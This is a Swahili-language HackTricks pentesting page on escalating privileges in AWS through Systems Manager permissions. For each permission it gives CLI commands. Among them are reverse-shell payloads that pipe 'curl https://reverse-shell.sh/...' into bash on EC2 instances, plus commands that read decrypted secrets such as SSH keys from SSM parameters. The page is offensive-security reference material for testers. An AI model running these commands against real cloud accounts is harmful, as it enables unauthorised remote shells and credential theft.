Swahili - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - SSM Privesc

Support HackTricks

SSM

Kwa maelezo zaidi kuhusu SSM angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

ssm:SendCommand

Mshambuliaji mwenye ruhusa ssm:SendCommand anaweza kutekeleza amri katika mifano inayotumia Amazon SSM Agent na kuathiri IAM Role inayotembea ndani yake.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

Katika kesi unapotumia mbinu hii kuongeza mamlaka ndani ya EC2 instance ambayo tayari imeathiriwa, unaweza tu kukamata rev shell kwa ndani kwa:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayoendesha SSM Agents.

ssm:StartSession

Mshambuliaji mwenye ruhusa ssm:StartSession anaweza kuanzisha kikao kama cha SSH katika mifano inayokimbia Amazon SSM Agent na kuathiri IAM Role inayokimbia ndani yake.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Ili kuanza kikao unahitaji SessionManagerPlugin iliyosakinishwa: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Athari Zinazoweza Kutokea: Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotembea yenye SSM Agents inayoendesha.

Privesc kwa ECS

Wakati ECS tasks zinapokimbia na ExecuteCommand imewezeshwa watumiaji wenye ruhusa za kutosha wanaweza kutumia ecs execute-command ili kutekeleza amri ndani ya kontena. Kulingana na nyaraka hii inafanywa kwa kuunda channel salama kati ya kifaa unachotumia kuanzisha amri ya “exec“ na kontena lengwa na SSM Session Manager. (SSM Session Manager Plugin inahitajika ili hii ifanye kazi) Hivyo, watumiaji wenye ssm:StartSession wataweza kupata shell ndani ya ECS tasks ikiwa chaguo hicho kimewezeshwa kwa kukimbia tu:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa majukumu ya ECSIAM yaliyoambatanishwa na kazi zinazotembea zikiwa na ExecuteCommand iliyoanzishwa.

ssm:ResumeSession

Mshambuliaji mwenye ruhusa ssm:ResumeSession anaweza ku-anzisha tena kikao kama cha SSH katika mifano inayotembea Amazon SSM Agent ikiwa na hali ya kikao cha SSM kilichounganishwa na kuathiri IAM Role inayotembea ndani yake.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa EC2 IAM roles zilizounganishwa na mifano inayotembea yenye SSM Agents zinazotembea na vikao vilivyokatishwa.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

Mshambuliaji mwenye ruhusa zilizoelezwa atakuwa na uwezo wa kuorodhesha SSM parameters na kuzisoma kwa maandiko wazi. Katika vigezo hivi unaweza mara nyingi kupata taarifa nyeti kama funguo za SSH au funguo za API.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya vigezo.

ssm:ListCommands

Mshambuliaji mwenye ruhusa hii anaweza kuorodhesha amri zote zilizotumwa na kwa matumaini kupata taarifa nyeti juu yao.

aws ssm list-commands

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya mistari ya amri.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Mshambuliaji mwenye ruhusa hizi anaweza orodhesha amri zote zilizotumwa na kusoma matokeo yaliyotolewa akitumaini kupata taarifa nyeti ndani yake.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya matokeo ya amri.

Codebuild

Unaweza pia kutumia SSM kuingia ndani ya mradi wa codebuild unaojengwa:

AWS - Codebuild Privesc
Support HackTricks
PreviousAWS - Secrets Manager PrivescNextAWS - Step Functions Privesc

Last updated